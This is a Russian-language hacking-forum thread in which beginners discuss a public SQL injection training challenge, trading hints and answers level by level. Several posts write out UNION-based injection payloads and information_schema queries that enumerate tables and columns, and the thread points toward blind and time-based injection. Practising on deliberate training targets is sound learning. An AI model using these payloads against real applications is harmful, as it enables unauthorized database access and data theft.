Челлендж по SQL Injection для новчиков

Discussion in 'Песочница' started by yarbabin, 25 Mar 2015.

  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    дабы не задавать простых вопросов по sqli рекомендую к прохождению
    https://alexbers.com/sql/

    ответы на все вопросы: https://forum.antichat.ru/thread104591.html
     
    _________________________
    K800 likes this.
  2. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Предлагаю посоревноваться ;)
    Первый, кто опубликует прохождение, получит печеньки в виде "+".
    Приветствуются не шаблонные запросы, старайтесь сокращать запросы до минимального количества символов, в общем придумывайте какие-то ограничения и обходите их. Ждем! :)

    p.s. Цветные не в счет :D
     
    #2 YaBtr, 25 Mar 2015
    Last edited: 25 Mar 2015
  3. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Так и не понял какой ответ на 4 уровне. Все данные из таблиц перепробовал.

    Всё сломалось:
     
    #3 MaxFast, 25 Mar 2015
    Last edited: 25 Mar 2015
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Ну блииин =(
     
    _________________________
  5. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    MaxFast, dg
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    хинт: schema
     
    _________________________
  7. TADIAMOND

    TADIAMOND Member

    Joined:
    19 Feb 2011
    Messages:
    140
    Likes Received:
    40
    Reputations:
    6
    Что-то не пойму, так и должно быть на первом уровне?
     
  8. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Дошел до 10 и понял что alexbers полный извращенец!!
    Этож надо юзеров заставлять blind и time based скули руками крутить!
     
    #8 psihoz26, 26 Mar 2015
    Last edited by a moderator: 26 Mar 2015
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    для понимания, как все работает, это не так уж плохо
     
    _________________________
  10. MegaByyte

    MegaByyte New Member

    Joined:
    27 Sep 2013
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    в 8 левеле точно нет ошибки ?
    там, где пароль пользователя с ником fast
     
  11. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    Очень интересный челлендж. Завис на 4 уровне.
    select * from users where id=2' union select 1,ggg,3 from secret -- or login='$text' limit 1

    А дальше как действовать?
     
  12. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    ' union select * from secret where ggg='abc'--

    только ппц как условие звучит.." найти ДАННОЕ таблицы"
     
  13. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    7
    Reputations:
    1
    Спасибо. Вот именно условие меня и смутило...
     
  14. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Как пройти 5 левел вроде делаю правильний запрос, но все равно ошибка

    ' union select table_name from information_schema.tables where table_name='secret'--
     
  15. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    Ну раз ты пошел таким путем, тогда так
    'union+select+column_name,2,3+from+information_schema.columns+where+table_name='secret'+--+
    в итоге: 'union+select+dfgfddfgdfdfdf,dfgdfgfdg,null+from+secret+--+

    но, можно и проще:'union+select+*,null+from+secret+--+
     
    #15 smirk, 29 Mar 2015
    Last edited: 29 Mar 2015
  16. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    почему union select 1,2,3 ? там ж, только 2 поля
     
    #16 teh, 29 Mar 2015
    Last edited: 29 Mar 2015
  17. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    А как 8 левел пройти? Пасс думаю там в числово буквенном виде. А выводиться только то, что произошла какая-то ошибка, или количество выведенных записей. что тогда делать?
     
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    варианта два. либо true (когда нет ошибки), либо false (есть ошибка). на что похоже?
     
    _________________________
  19. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    на слепую? Но как то пасс узнать
     
    #19 teh, 29 Mar 2015
    Last edited: 29 Mar 2015
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    А кто тебя заставляет руками крутить? ;)
     
    _________________________
    Soviet[HZ] likes this.